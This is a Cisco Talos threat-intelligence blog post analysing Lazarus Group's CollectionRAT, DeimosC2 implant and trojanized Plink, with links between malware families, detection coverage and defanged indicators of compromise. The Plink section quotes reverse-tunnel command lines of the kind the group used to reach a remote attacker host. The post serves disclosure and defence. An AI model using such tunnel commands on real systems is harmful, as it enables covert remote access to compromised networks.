                                <path class="podcast-fill" d="M21.8,15.1c0-7.8,6.3-14.1,14.1-14.1c7.8,0,14.1,6.3,14.1,14.1v25.4c0,7.8-6.3,14.1-14.1,14.1  c-7.8,0-14.1-6.3-14.1-14.1V15.1z M59.9,40.1c0,12.4-9.4,22.6-21.5,23.9v3.6h12.8c1.4,0,2.6,1.2,2.6,2.6c0,1.4-1.2,2.6-2.6,2.6H20.4  c-1.4,0-2.6-1.2-2.6-2.6c0-1.4,1.2-2.6,2.6-2.6h12.8V64c-12-1.3-21.5-11.5-21.5-23.9v-6.8c0-1.4,1.2-2.6,2.6-2.6  c1.4,0,2.6,1.2,2.6,2.6v6.8c0,10.4,8.5,18.8,18.8,18.8c10.4,0,18.8-8.5,18.8-18.9v-6.8c0-1.4,1.2-2.6,2.6-2.6c1.4,0,2.6,1.2,2.6,2.6  V40.1z"></path>
                            </svg>

                            <span>
                                Podcasts
                            </span>
                        </a>
                    </div>
                </li>

            </ul>
        </div>
    </div>
</nav>
    

    <main id="site-main">
        <div class="container-fluid">
            <div class="row main-content-row">
                <div class="col post-full-content">
                    
<article class="post tag-threats tag-securex-3 tag-landing-page-top-story tag-top-story featured ">
        <div class="feature-image-wrapper my-5">
            <figure>
                <img src="/content/images/2023/08/lazarus-group-1.jpg" alt="" class="img-fluid" />
            </figure>
        </div>

    <h1 class="text-center">Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware</h1>

    <div class="text-center m-1">
        <div class="post-author">
            <span>By </span>
                <a href="https://blog.talosintelligence.com/author/asheer-malhotra/">Asheer Malhotra</a>, 
                <a href="https://blog.talosintelligence.com/author/vitor-ventura/">Vitor Ventura</a>, 
                <a href="https://blog.talosintelligence.com/author/jungsoo/">Jungsoo An</a>
        </div>

        <br/>
        <time class="post-datetime" datetime="2023-08-24T08:08">
            Thursday, August 24, 2023 08:08
        </time>

        <div class="m-3">
                            <a href="/category/threats/" class="category primary-category">
                                Threats
                            </a>
                                                    <a href="/category/securex-3/" class="category primary-category">
                                SecureX
                            </a>
                                </div>
    </div>

    <section class="post-content-wrapper mt-5">
        <div class="post-content">
            <ul><li>In the Lazarus Group’s latest campaign, which we detailed in a <a href="https://blog.talosintelligence.com/lazarus-quiterat/">recent blog</a>, the North Korean state-sponsored actor is exploiting <a href="https://nvd.nist.gov/vuln/detail/cve-2022-47966">CVE-2022-47966</a>, a ManageEngine ServiceDesk vulnerability, to deploy multiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called “CollectionRAT.”<br></li><li>CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to <a href="https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499">Jupiter</a>/<a href="https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/">EarlyRAT</a>, another malware family Kaspersky recently wrote about and attributed to <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/silent_chollima">Andariel</a>, a subgroup within the Lazarus Group umbrella of threat actors.<br></li><li>Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase. <br></li><li>One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. 
The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.</li></ul><h1 id="lazarus-group-reuses-infrastructure-in-continuous-assault-on-enterprises">Lazarus Group reuses infrastructure in continuous assault on enterprises</h1><p>In the new Lazarus Group campaign we recently disclosed, the <a href="https://www.cisa.gov/uscert/northkorea">North Korean state-sponsored </a>actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.</p><p>As mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, <a href="https://blog.talosintelligence.com/lazarus-three-rats/">Talos published details of a Lazarus Group campaign</a> targeting energy providers in the United States, Canada and Japan. 
This campaign, enabled by the successful exploitation of <a href="https://blog.talosintelligence.com/apache-log4j-rce-vulnerability/">the Log4j vulnerability</a>, heavily employed a previously unknown implant we called “<a href="https://blog.talosintelligence.com/lazarus-magicrat/">MagicRAT</a>,” along with known malware families <a href="https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html">VSingle</a>, <a href="https://blogs.jpcert.or.jp/en/2022/07/yamabot.html">YamaBot</a> and <a href="https://www.boho.or.kr/krcert/publicationView.do?bulletin_writing_sequence=36276">TigerRAT</a>, all of which were previously attributed to the threat actor by Japanese and Korean government agencies. </p><p>Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by <a href="https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf">WithSecure</a>. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier-to-deploy malicious implant, based on its size.</p><figure class="kg-card kg-image-card"><img src="https://lh3.googleusercontent.com/0knNqa58yI-TPNceZf7WZLG4Rvfr6emgpGrOmCUvHAmzgv2HoQ7KGdmQ9YCwhAt-mH6ZQ6pD1a6MQoYleMF0EJ8ArQP4WFcCppcwGCZgzV9jleiFXKzDyM0cspeuDaapxmBFzEYuXRAIoN3KN6JGsqU" class="kg-image" alt loading="lazy" width="624" height="380"></figure><p><br>In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. 
We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their <a href="https://blog.talosintelligence.com/lazarus-three-rats/">preceding campaign</a> from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. <a href="https://blog.talosintelligence.com/lazarus-three-rats/">Lazarus has been known</a> to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.</p><p>Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as <a href="https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499">Jupiter</a>/<a href="https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/">EarlyRAT</a> (also from 2021), a malware family listed in CISA’s advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a">detailing recent North Korean ransomware activity</a>.</p><p>The connections between the various malware are depicted below:</p><figure class="kg-card kg-image-card"><img src="https://lh3.googleusercontent.com/Sgs0ezangb-hD4iNypVdBBrT9G6y8DklykW9hf0rixJdtQz-hPBKyWwcCSsMRyF2wLwihRmOGD7G9BMlvbNE07BDp-UUAOtFOnZaz2cQTbVaOpQiayyynWdRSoXTM-CwO58fta81RsU2Lge_rVbnjJ0" class="kg-image" alt loading="lazy" width="624" height="443"></figure><h1 id="lazarus-evolves-malicious-arsenal-with-collectionrat-and-deimosc2">Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2</h1><p>CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. 
The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code. </p><p>CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. 
The implant can also remove itself from the endpoint when directed by the C2.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh3.googleusercontent.com/8Ai5b0p0xLBPrUWIPj7cH-Eepy0quNA5TDTMeQtPdV787UnXr2tPyIDvD7bZxFwGMSoxABmv7J2OBvjQ9QwZPmTe3uZ_sep8GQBDJbi7_BPbdQ7S0Phni8dycbtGvQjoE9bKVfkRfvDqfQa3hmSCh3M" class="kg-image" alt loading="lazy" width="624" height="763"><figcaption>Implant's configuration strings.</figcaption></figure><p>The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh5.googleusercontent.com/dJy5tYazxoNvrfrN5jBrZcOAGPg1uiQtPy0iE_VfQsSkqX5KfUYLLLoK4u949TvXkIk2HbKxBbgTSKyFVhbWXvpe6GoIfsvgwWnpMrIDlG4_uyeP0cbWIfq40tkZDvSLy9NpAkDi9UQ3L25HwAjoq00" class="kg-image" alt loading="lazy" width="624" height="111"><figcaption>Initial check-in over HTTP to C2 server.</figcaption></figure><h3 id="collectionrat-and-its-link-to-earlyrat">CollectionRAT and its link to EarlyRAT</h3><p>Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to <a href="https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/">EarlyRAT</a>, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a">CISA’s advisory</a> from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. 
Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. <a href="https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499">DCSO CyTec’s blog</a> contains more details about Jupiter.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh4.googleusercontent.com/I2X7uvkyIQP-HWZvEox_QMupReSh1CvKM93DZ3UnL1E_GqRvBCTovAYlRhnc_RilV8TlLk1pfmoQwkcjRaQbZgJeAJk1DmLtu_WyUBkMma-Wrb9DDrT43b-E6YjAggU19ukcs5_tziG-n7H0DbB2sPU" class="kg-image" alt loading="lazy" width="624" height="601"><figcaption>Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT</figcaption></figure><h2 id="adoption-of-open-source-tools-during-initial-access-%E2%80%94-deimosc2">Adoption of open source tools during initial access — DeimosC2</h2><p>Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools, credential-dumping tools such as Mimikatz, and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. 
DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as <a href="https://www.cobaltstrike.com/">Cobalt Strike</a> and <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver">Sliver</a>.</p><h3 id="deimosc2-analysis">DeimosC2 analysis</h3><p>Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.</p><p>The implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. 
The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to the framework and adapting it to their needs.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh6.googleusercontent.com/UTg9wkiNl0X7B7SxESBikyhYckBxi5jXzGYM43EcCgfzQfJuyg_emXeFPQ7xr72Yam6Daip7l950jWaWF2pzy_U2-9r5R6HK8ZvBUelctZ-EAlIjlyMh_7SNf8pvMYKYuL8hHimyDjw8NAr1jRq_wMQ" class="kg-image" alt loading="lazy" width="438" height="436"><figcaption>Configuration in the DeimosC2 implant.</figcaption></figure><p><a href="https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html">Trend Micro has an excellent analysis</a> of DeimosC2; in short, the implants typically have various RAT capabilities such as:</p><ul><li>Execute arbitrary commands on the endpoint.</li><li>Credential stealing and registry dumping.</li><li>Download and upload files from C2.</li><li>Shellcode execution.</li><li>Uninstallation of the implant.</li></ul><h2 id="malicious-plink">Malicious Plink</h2><p>Another open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish a remote tunnel using commands such as:</p><p><code>pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] &lt;Remote_IP&gt;</code></p><p>The -R option creates a reverse tunnel: connections to port 18118 on the remote server are forwarded back to port 8118 on the local host (127.0.0.1).</p><p>However, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. 
The following figure shows a comparison of:</p><ul><li>The malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:</li></ul><p><code>Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username]-pw [password] &lt;Remote_IP&gt;</code></p><ul><li>A benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://lh5.googleusercontent.com/axenp8FJn8YsIOt75-dEBbu9Yf5W4-yab01M8BPw3o_jOAWbwQWkAzQ1N7Mp2muOzBQos8ETrDS7tIutWqXyp5KFKc9g701ob7D0nhXBEGnnbLBJa0w9dhHtKepZ42EGmE6KNdLfrZuS9SQA9h0W55M" class="kg-image" alt loading="lazy" width="624" height="479"><figcaption>A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.</figcaption></figure><p>The malicious Plink will also create a mutex named “Global\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.</p><h1 id="coverage">Coverage</h1><p>Ways our customers can detect and block this threat are listed below.</p><figure class="kg-card kg-image-card"><img src="https://lh6.googleusercontent.com/K2rcDymAOE1OBOMZJbq5R71N74IkefvDAoOhi2U-0xMhD1EkXieWe7Q0vHCX6f-e_pyaCLQfjjjLuMhREonMG-sME0TQ1fXu-jpc6g5zd0T1R02n2gi7v-N3J1Huq8f_uYDLcsnOsV3a5yNZWMQBaFw" class="kg-image" alt loading="lazy" width="624" height="127"></figure><p><a href="https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html">Cisco Secure Endpoint</a> (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. 
Try Secure Endpoint for free <a href="https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium=web-referral?utm_source=cisco&amp;utm_campaign=amp-free-trial&amp;utm_term=pgm-talos-trial&amp;utm_content=amp-free-trial">here.</a></p><p><a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Cisco Secure Web Appliance</a> web scanning prevents access to malicious websites and detects malware used in these attacks.</p><p><a href="https://www.cisco.com/c/en/us/products/security/email-security/index.html">Cisco Secure Email</a> (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free <a href="https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium=web-referral&amp;utm_source=cisco&amp;utm_campaign=cmd-free-trial-request&amp;utm_term=pgm-talos-trial">here</a>.</p><p><a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">Cisco Secure Firewall</a> (formerly Next-Generation Firewall and Firepower NGFW) appliances such as <a href="https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html">Threat Defense Virtual</a>, <a href="https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html">Adaptive Security Appliance</a> and <a href="https://meraki.cisco.com/products/appliances">Meraki MX</a> can detect malicious activity associated with this threat.</p><p><a href="https://www.cisco.com/c/en/us/products/security/threat-grid/index.html">Cisco Secure Malware Analytics</a> (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.</p><p><a href="https://umbrella.cisco.com/">Umbrella</a>, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella <a href="https://signup.umbrella.com/?utm_medium=web-referral?utm_source=cisco&amp;utm_campaign=umbrella-free-trial&amp;utm_term=pgm-talos-trial&amp;utm_content=automated-free-trial">here</a>.</p><p><a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Cisco Secure Web Appliance</a> (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.</p><p>Additional protections with context to your specific environment and threat data are available from the <a href="https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html">Firewall Management Center</a>.</p><p><a href="https://signup.duo.com/?utm_source=talos&amp;utm_medium=referral&amp;utm_campaign=duo-free-trial">Cisco Duo</a> provides multi-factor authentication for users to ensure only those authorized are accessing your network.</p><p>Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>. 
Snort SIDs for this threat: <strong>62248, 62253-62255.</strong></p><h1 id="iocs">IOCs</h1><p>IOCs for this research can also be found in our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/tree/main/2023/08">here</a>.</p><h2 id="hashes">Hashes<br></h2><h3 id="quiterat">QuiteRAT</h3><p>ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6<br></p><h3 id="collectionrat">CollectionRAT</h3><p>db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984</p><p>773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df<br></p><h3 id="deimosc2">DeimosC2</h3><p>05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d<br></p><h3 id="trojanized-plink">Trojanized Plink</h3><p>e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe</p><h2 id="networks-iocs">Networks IOCs<br></h2><p>146[.]4[.]21[.]94</p><p>109[.]248[.]150[.]13</p><p>108[.]61[.]186[.]55:443</p><p>hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat</p><p>hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php</p><p>hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php</p><p>hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php</p><p>hxxp[://]109[.]248[.]150[.]13/EsaFin[.]exe</p><p>hxxp[://]146[.]4[.]21[.]94/boards/boardindex[.]php</p><p>hxxp[://]146[.]4[.]21[.]94/editor/common/cmod</p>
        </div>
    </section>
    <div class="social-media-wrapper">
</div></article>
                </div>
            </div>
        </div>
    </main>


    


</body>

</html>